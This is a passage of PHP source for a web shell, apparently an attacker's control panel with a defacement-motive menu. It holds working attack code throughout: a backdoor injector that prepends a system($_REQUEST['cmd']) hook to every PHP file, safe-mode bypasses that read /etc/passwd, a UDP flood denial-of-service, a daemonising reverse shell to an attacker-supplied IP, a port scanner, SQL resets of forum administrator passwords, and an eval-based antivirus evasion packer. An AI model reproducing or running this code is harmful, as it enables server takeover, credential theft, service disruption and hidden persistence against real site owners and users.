<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
<input type="submit" value="Send"/></ul>
</form>
</div>
<?php
}
function displayExploit()
{
global $exploitwebsite;
$release = @php_uname('r');
$kernel = @php_uname('s');
$sversion="";
if(strpos('Linux', $kernel) !== false)
$sversion= urlencode('Linux Kernel ' . substr($release,0,6));
else
$sversion= urlencode($kernel . ' ' . substr($release,0,3));
echo "<div class='bodydiv'>";
echo "<font size='6em'><a href='http://www.exploit-db.com/search/?action=search&description=" . $sversion . "' onclick='return !window.open(this.href);'> Exploit-db </a><br>";
echo "<a href='https://www.google.com/?q=" . $sversion . " Exploit' onclick='return !window.open(this.href);'> Google </a> <br>";
echo "</font></div>";
}
function displayCodeInject()
{
global $codeInject;
if(isset($codeInject))
{
//var_dump($codeInject);
if(isset($_SESSION['current_dir'])){
chdir($_SESSION['current_dir']);
}
$handle = opendir($_SESSION['current_dir']);
while($aux = readdir($handle)) {
if(!is_dir($aux) and strpos($aux,".php")!==false )
{
file_put_contents($aux,"<?php \n" . $codeInject . " ?>" . file_get_contents($aux));
}
}
@closedir($handle);
}
?>
<div class='bodydiv'>
<form action="">
Inject PHP Code all .php files in current directory!<br><br>
<?
<br>
<textarea rows="14" name='codeInject'>
if(isset($_REQUEST["cmd"]))
{
system($_REQUEST["cmd"]);
}
</textarea>
<br>
?>
<br>
<br>
<input type="submit" name="Submit" value="Inject">
</form>
</div>
<?php
}
function bypassCopy($file)
{
if(@copy($file,"test1.php"))
{
$fh=fopen("test1.php",'r');
echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
@fclose($fh);
unlink("test1.php");
}
return true;
}
function bypassImap($file)
{
$stream = @imap_open($file, "", "");
$str = @imap_body($stream, 1);
echo "<textarea cols=120 rows=20 class=box readonly>";
echo $str;
echo "</textarea>";
return true;
}
function bypassSql($file)
{
/*
else if(isset($_GET['sql']))
{
echo "<textarea cols=120 rows=20 class=box readonly>";
$file=$_GET['sql'];
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
$sql = array (
"USE $mdb",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
mysql_connect ($mhost, $muser, $mpass);
foreach ($sql as $statement) {
$q = mysql_query ($statement);
if ($q == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($q);
}
echo "</textarea>";
}*/
}
function bypassCurl($file)
{
$ch=@curl_init("file://" . $file);
@curl_setopt($ch,CURLOPT_HEADERS,0);
@curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$file_out=@curl_exec($ch);
@curl_close($ch);
echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
return true;
}
function bypassId($file)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
for($uid=0;$uid<60000;$uid++)
{ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara))
{
while (list ($key, $val) = each($ara))
{
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
return true;
}
function bypassTmp($file)
{
$mytmp = tempnam ( 'tmp', $file );
$fp = fopen ( $mytmp, 'r' );
while(!feof($fp))
echo fgets($fp);
fclose ( $fp );
return true;
}
function bypassSymlink($file)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
@mkdir("dat.001",0777);
@chdir("dat.001");
exec("ln -s " .$file." passwd");
echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/dat.001/passwd");
echo "</textarea>";
return true;
}
function bypassxxd($filename)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
echo @shell_exec("xxd ".$filename);
echo "</textarea>";
return true;
}
function bypassrev($filename)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
echo @shell_exec("rev ".$filename);
echo "</textarea>";
return true;
}
function bypasstac($filename)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
echo @shell_exec("tac ".$filename);
echo "</textarea>";
return true;
}
function bypassmore($filename)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
echo @shell_exec("more ".$filename);
echo "</textarea>";
return true;
}
function bypassless($filename)
{
echo "<textarea cols=120 rows=20 class=box readonly>";
echo @shell_exec("less ".$filename);
echo "</textarea>";
return true;
}
function displayBypassers()
{
global $tgtfile,$islinux,$tgt;
?>
<div class='bodydiv'>
http://ragde4.blogspot.com/2012/04/all-safemode-bypass-exploit.html<br>
http://hackers2devnull.blogspot.com/2013/05/when-safe-mode-is-on-it-can-be-pain-to.html<br>
http://xedlgubaid.blogspot.com/2012/05/how-to-bypass-safe-mode-on-in-server.html<br><br>
<form method="post">
File: <br><input name='tgtfile' value="/etc/passwd"> <br>
<table id='bypass'>
<tr><td>Bypass with Copy</td><td><input type="submit" name="tgt" value="Copy"></td></tr>
<tr><td>Bypass with Imap</td><td><input type="submit" name="tgt" value="Imap"></td> </tr>
<tr><td>Bypass with Curl</td><td><input type="submit" name="tgt" value="Curl"> </td></tr>
<tr><td>Bypass with Id</td><td><input type="submit" name="tgt" value="Id"> </td></tr>
<tr><td>Bypass with Tmpnam</td><td> <input type="submit" name="tgt" value="Tmp"></td></tr>
<tr><td>Bypass with Symlink</td><td><input type="submit" name="tgt" value="Symlink"> </td></tr>
<tr><td>Bypass with xxd</td><td><input type="submit" name="tgt" value="xxd"></td> </tr>
<tr><td>Bypass with rev</td><td><input type="submit" name="tgt" value="rev"> </td></tr>
<tr><td>Bypass with tac</td><td><input type="submit" name="tgt" value="tac"> </td></tr>
<tr><td>Bypass with more</td><td><input type="submit" name="tgt" value="more"></td> </tr>
<tr><td>Bypass with less</td><td><input type="submit" name="tgt" value="less"> </td></tr>
</table>
</form>
</div>
<?php
if(isset($tgtfile))
{
echo "<br>Bypassing " . $tgtfile . "<br>";
if($tgt==="Copy" and bypassCopy($tgtfile)===true)
{
echo "bypassed";
}
//echo "Bypassing with Imap...<br>";
//if(@bypassImap($tgtfile)===true)
//{
// echo "bypassed!";
//}
//echo "Bypassing with Curl...<br>";
//try {
// if(bypassCurl($tgtfile)===true)
// {
// echo "bypassed!";
// }
//}
//catch(Exception $e)
//{
// echo $e->getMessage();
// }
if($islinux)
{
if($tgt=="Id" and @bypassId($tgtfile)===true)
{
echo "bypassed!";
}
}
if($tgt=="Tmp" and bypassTmp($tgtfile)===true)
{
echo "bypassed!";
}
if($tgt==="Symlink" and @bypassSymlink($tgtfile)===true)
{
echo "bypassed!";
}
if($tgt==="xxd" and @bypassxxd($tgtfile)===true)
{
echo "bypassed!";
}
if($tgt==="rev" and @bypassrev($tgtfile)===true)
{
echo "bypassed!";
}
if($tgt==="tac" and @bypasstac($tgtfile))
{
echo "bypassed!";
}
if($tgt==="more" and @bypassmore($tgtfile))
{
echo "bypassed!";
}
if($tgt==="less" and @bypassless($tgtfile))
{
echo "bypassed!";
}
}
}
function displayDoS()
{
global $ip1,$exTime,$port,$timeout;
?>
<div class='bodydiv'>
<form method="post">
<table>
<tr><td>Target IP : </td><td><input name="ip1" value=""></td></tr>
<tr><td>Target Port:</td><td> <input name="port" value=80></td></tr>
<tr><td>Execution Time Seconds:</td><td> <input name="exTime" value=10></td></tr>
<tr><td>Time Out:</td><td> <input name="timeout" value=5></td></tr>
</table>
<input type="submit" value="DoS">
</form>
</div>
<?php
//https://github.com/drego85/DDoS-PHP-Script/blob/master/ddos.php#L6
if(isset($ip1) and isset($port) and isset($exTime) and isset($timeout))
{
$pktSize = 609999;
$data = "";
$packets = 0;
$counter = $pktSize;
$maxTime = time() + $exTime;;
while($counter--)
{
$data .= "X";
}
while(1)
{
$socket = fsockopen("udp://$ip1", $port, $error, $errorString, $timeout);
if($socket)
{
fwrite($socket , $data);
fclose($socket);
$packets++;
}
if(time() >= $maxTime)
{
break;
}
}
echo "<div class='bodyDiv'>";
echo "Dos Completed!<br>";
echo "DOS attack against udp://$ip1:$port completed on ".date("h:i:s A")."<br />";
echo "Total Number of Packets Sent : " . $packets . "<br />";
echo "Total Data Sent = ". format_size($packets*$pktSize) . "<br />";
echo "Data per packet = " . format_size($pktSize) . "<br />";
echo "</div>";
}
}
function displayLogs()
{
?>
<div class='bodydiv'>
Logs from server...!
</div>
<?php
}
function displaySelfKill()
{
global $KillMe;
echo "<div class='bodyDiv'> Are you sure?<br>";
echo "<form method='post'> <input type='Submit' name='KillMe' value='KillMe'></form>";
if(isset($KillMe))
total_delete( __FILE__);
}
function displayReverseNetcat()
{
global $ip,$port;
?>
<div class='bodyDiv'>
<form method="post">
IP : <input name="ip">
Port: <input name="port">
<input type="submit" name="submit" value="Run">
</form>
<br>First Run #nc -lvp [port] , then run this script.
</div>
<?php
if(isset($ip) and isset($port))
{
echo "<div class='bodyDiv'>Connecting</div>";
reverseNetcat();
}
}
function reverseNetcat()
{
global $daemon,$ip,$port;
set_time_limit (0);
//$ip = $_REQUEST['ip']; //'127.0.0.1'; // CHANGE THIS
//$port = $_REQUEST['port']; //1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
function printit ($string) {
global $daemon;
if (!$daemon) {
print "$string\n";
}
}
function displayPortScanner()
{
global $tgtip,$proto;
if(!isset($tgtip))
{
$tgtip='localhost';
}
?>
<div class='bodyDiv'>
<form method="post">
Target: <input name='tgtip' value='<?php echo $tgtip;?>' ><br>
<input type="radio" value="tcp" name="proto"> TCP <br>
<input type="radio" value="udp" name="proto"> UDP <br>
<input type="submit" value="Scan">
</form>
</div>
<div class='bodyDiv'>
<?php
if(isset($proto))
{
echo "Open Ports: ";
$myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
for($current = 0; $current <= 23; $current++)
{
$currents = $myports[$current];
$service = getservbyport($currents, $proto);
// Try to connect to port
$result = @fsockopen($tgtip, $currents, $errno, $errstr, 1);
// Show results
if($result)
{
echo "<font class=txt>$currents, </font>";
flush();
}
}
}
echo "</div>";
}
function displayForums()
{
global $faction;
?>
<div class='bodydiv'>
<form method="post">
<table id='db'>
<tr><td>DB Host:</td><td> <input name='dbhost'></td></tr>
<tr><td>DB Name:</td><td><input name='dbname'></td></tr>
<tr><td>DB User:</td><td> <input name='dbusername'></td></tr>
<tr><td>DB Pass:</td><td> <input name='dbpassword'></td></tr>
<tr><td>Forum: </td><td><select name="forum" ">
<option value="wp">Wordpress</option>
<option value="joomla">Joomla</option>
<option value="vb">vBulletin</option>
<option value="phpbb">phpBB</option>
<option value="mybb">MyBB</option>
</select></td></td></tr>
<tr><td>User:</td><td> <input name='username'></td></tr>
<tr><td>New Pass:</td><td> <input name='newpassword'></td></tr>
<tr><td>Table Prefix:</td><td> <input name='prefix'></td></tr>
</table>
<input type="submit" name='faction' value='ChangeForumPass'><br><br>
<textarea rows="3" name='defacedata'></textarea><br><br>
<input type="submit" name='faction' value='DefaceForum'>
</form>
</div>
<?php
if(isset($faction) and $faction==='ChangeForumPass')
{
changeForumPassword();
}
if(isset($faction) and $faction==='DefaceForum')
{
defaceForums();
}
}
function changeForumPassword()
{
global $dbhost,$dbname,$dbusername,$dbpassword,$forum,$defacedata,$username,$newpassword,$prefix;
//echo "db host ".$dbhost."db name ".$dbname."db username ".$dbusername.
//"db pass ".$dbpassword."forums ".$forums."db defacedata: ".$defacedata;
//echo "this is change forum password";
if($forum === "wp")
{
$con = mysql_connect($dbhost,$dbusername,$dbpassword);
$db = mysql_select_db($dbname,$con);
$newpassword = md5($newpassword);
if($prefix == "" || $prefix == null)
$sql = mysql_query("update wp_users set user_pass = '$newpassword' where user_login = '$username'");
else
$sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword' where user_login = '$username'");
if($sql)
{
mysql_close($con);
echo "<font class=txt>Password Changed Successfully</font>";
}
else
echo "Cannot Change Password";
}
if($forum === "joomla")
{
$con = mysql_connect($dbhost,$dbusername,$dbpassword);
$db = mysql_select_db($dbname,$con);
$newpassword = md5($newpassword);
if($prefix == "" || $prefix == null)
$sql = mysql_query("update josvk_users set password = '$newpassword' where username = '$username' ");
else
$sql = mysql_query("update ".$prefix."users set password = '$newpassword' where username = '$username' ");
if($sql)
{
mysql_close($con);
echo "<font class=txt>Password Changed Successfully</font>";
}
else
echo "Cannot Change Password";
}
if($forum === "phpbb")
{
//echo "db host ".$dbhost."db name ".$dbname."db username ".$dbusername.
// "db pass ".$dbpassword."forums ".$forum."db defacedata: ".$defacedata
// ."new pass: ".$newpassword ."db username: ".$username;
$con = mysql_connect($dbhost,$dbusername,$dbpassword);
$db = mysql_select_db($dbname,$con);
$newpassword = md5($newpassword);
if($prefix == "" || $prefix == null)
$sql = mysql_query("update phpbb_users set user_password = '$newpassword' where username = '$username' ");
else
$sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where username = '$username' ");
if($sql)
{
mysql_close($con);
echo "<font class=txt>Password Changed Successfully</font>";
}
else
echo "Cannot Change Password";
}
if($forum === "mybb")
{
$con = mysql_connect($dbhost,$dbusername,$dbpassword);
$db = mysql_select_db($dbname,$con);
$salt="00700700";
$newpassword = md5(md5($salt).md5($newpassword));
if($prefix == "" || $prefix == null)
$sql = mysql_query("update mybb_users set password = '$newpassword',salt = '$salt'
where username = '$username' ");
else
$sql = mysql_query("update ".$prefix."users set password = '$newpassword',salt = '$salt'
where username = '$username' ");
if($sql)
{
mysql_close($con);
echo "<font class=txt>Password Changed Successfully</font>";
}
else
echo "Cannot Change Password";
}
if($forum === "vb")
{
$con = mysql_connect($dbhost,$dbusername,$dbpassword);
$db = mysql_select_db($dbname,$con);
$salt="00700700";
$newpassword = md5(md5($newpassword) . $salt);
if($prefix == "" || $prefix == null)
$sql = mysql_query("update user set password = '$newpassword',salt = '$salt'
where username = '$username' ");
else
$sql = mysql_query("update ".$prefix."users set password = '$newpassword',salt = '$salt'
where username = '$username' ");
if($sql)
{
mysql_close($con);
echo "<font class=txt>Password Changed Successfully</font>";
}
else
echo "Cannot Change Password";
}
}
function defaceForums()
{
global $dbhost,$dbname,$dbusername,$dbpassword,$forum,$defacedata,$newusername,$newpassword;
//echo $dbhost.$dbname.$dbusername.$dbpassword.$forums.$defacedata;
echo "this is deface forum!";
}
function displayEvadeAV()
{
global $file1,$file2;
?>
<div class='bodydiv'>
<form method="post">
Input Filename: <input name="file1"> Output Filename: <input name="file2"> <br>
<input type="submit" value='EvadeAV' >
</form>
</div>
<?php
if(isset($file1) and isset($file2))
{
$data = file_get_contents($file1);
$dataEncoded = base64_encode(gzcompress($data,9));
$ev1 = "\$tmp='{$dataEncoded}';";
$ev2 = "\$tmp1 = gzuncompress(base64_decode(\$tmp));";
$output = "<?php {$ev1}
{$ev2}
eval(\"?>\".\$tmp1.\"<?php;\");
?>";
file_put_contents($file2,$output);
}
}
?>